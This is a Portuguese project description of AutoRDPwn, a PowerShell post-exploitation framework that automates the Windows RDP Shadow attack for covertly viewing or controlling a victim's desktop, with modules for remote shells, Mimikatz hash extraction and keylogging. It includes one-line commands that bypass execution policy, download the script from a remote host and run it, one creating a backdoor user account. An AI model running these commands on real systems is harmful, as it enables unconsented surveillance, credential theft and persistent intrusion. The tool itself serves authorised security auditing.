
O Shadow Attack Framework

AutoRDPwn é uma estrutura de pós-exploração criada em Powershell, projetada principalmente para automatizar o ataque Shadow em computadores Microsoft Windows. Esta vulnerabilidade (listada como uma funcionalidade pela Microsoft) permite que um invasor remoto veja a área de trabalho da sua vítima sem o consentimento dela, e até mesmo a controle sob demanda, usando ferramentas nativas do próprio sistema operacional.
Graças aos módulos adicionais, é possível obter um shell remoto através do Netcat, extrair hashes do sistema com o Mimikatz, carregar um keylogger remoto e muito mais. Tudo isso, através de um menu completamente intuitivo em sete idiomas diferentes.
Além disso, é possível usá-lo em um shell reverso através de uma série de parâmetros descritos na seção de uso.
Powershell 4.0 ou superior
• Muitos bugs corrigidos
• Melhorias estéticas e tempos de espera aprimorados
• Conexão Proxy-Aware através das configurações do sistema
• Agora é possível usar a ferramenta offline baixando o arquivo .zip
• Detecção automática de idioma ao pressionar a tecla Enter
• Invoke-DCOM foi substituído pelo SharpRDP
• PowerUp foi substituído pelo Invoke-PrivescCheck
• Criação da sub-rotina de limpeza automática na vítima
• Novo módulo disponível: SMB Shell criptografado com AES
• Novo módulo disponível: Alterar usuário com RunAs
*O restante das alterações pode ser consultado no arquivo CHANGELOG
Esta aplicação pode ser usada localmente, remotamente ou para pivotear entre equipes.
Quando usada remotamente em um shell reverso, é necessário usar os seguintes parâmetros:
Execução local em uma linha:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Exemplo de execução remota em uma linha:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
https://darkbyte.net/autordpwn-la-guia-definitiva

Este projeto está licenciado sob a licença GNU 3.0 - consulte o arquivo LICENSE para mais detalhes.
Este framework foi criado e projetado do zero por Joel Gámez Molina // @JoelGMSec
Alguns módulos usam código, scripts e ferramentas de terceiros, particularmente:
• Chachi-Enumerator por Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m por Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp por Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang
• Invoke-TheHash por Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz por Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz
• PsExec por Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper por Stas'M Corp. --> https://github.com/stascorp/rdpwrap
• SharpRDP por Steven F --> https://github.com/0xthirteen/SharpRDP
E muitos outros, que não cabem aqui.. Obrigado a todos eles e seu excelente trabalho.
Este software não oferece nenhum tipo de garantia. Seu uso é exclusivo para ambientes educacionais e/ou auditorias de segurança com o correspondente consentimento do cliente. Não me responsabilizo pelo seu uso indevido ou por qualquer dano causado por ele.
Para mais informações, você pode me encontrar no Twitter como @JoelGMSec e no meu blog darkbyte.net.
Você pode apoiar meu trabalho comprando-me um café:
| Parâmetro | Descrição |
|---|
| -admin / -noadmin | Dependendo das permissões que temos, usaremos um ou outro |
| -nogui | Isto evitará carregar o menu e algumas cores, garantindo sua funcionalidade |
| -lang | Escolheremos nosso idioma (Inglês, Espanhol, Francês, Alemão, Italiano, Russo ou Português) |
| -option | Assim como no menu, podemos escolher como lançar o ataque |
| -shadow | Decidiremos se queremos ver ou controlar o dispositivo remoto |
| -createuser | Este parâmetro é opcional, o usuário AutoRDPwn:AutoRDPwn será criado na máquina vítima |
| -noclean | Desabilita o processo de desfazer todas as alterações no computador vítima |